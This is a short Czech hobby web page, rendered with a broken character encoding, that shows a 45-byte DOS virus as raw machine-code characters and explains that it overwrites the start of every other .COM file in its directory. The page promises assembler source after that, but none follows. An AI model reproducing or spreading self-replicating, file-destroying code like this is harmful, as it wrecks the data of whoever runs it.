Virus na 45 bajt– :-)


Upozornˆn¡: Tato uk zka v‡etnˆ vysvˆtlivek slou‘¡ pouze pro zaj¡mavost, nikoliv jako n vod na psan¡ vir–!!

Tak vypad  kr tk˜ virus pro DOS (nebojte se, takhle je naprosto ne¨kodn˜):

º'´N±'Í!sÍ ºž¸=Í!“´@±-ºÍ!´>Í!´Oëà*.COM


Je tak jednoduch˜ a hloupou‡k˜, ‘e se um¡ jenom mno‘it. Napad  postupnˆ v¨echny ostatn¡ *.COM soubory v adres ©i a p©episuje jejich za‡ tky s m sebou. Nem  re lnou ¨anci se roz¨¡©it, jen‘e £‡elem ho nebylo udˆlat inteligentn¡, ale co nejkrat¨¡. Samoz©ejmˆ se d  zkr tit je¨tˆ v¡c, ale ka‘d‚ takov‚ zkr cen¡ je v–‡i syst‚mu nekorektn¡. Tot lnˆ o©ezan˜ vir mˆl sice jenom 28 bajt–, ale vˆt¨inou fungoval ¨patnˆ. Zdroj k v assembleru vypad  takhle:Zpˆt na hlavn¡ str nku
.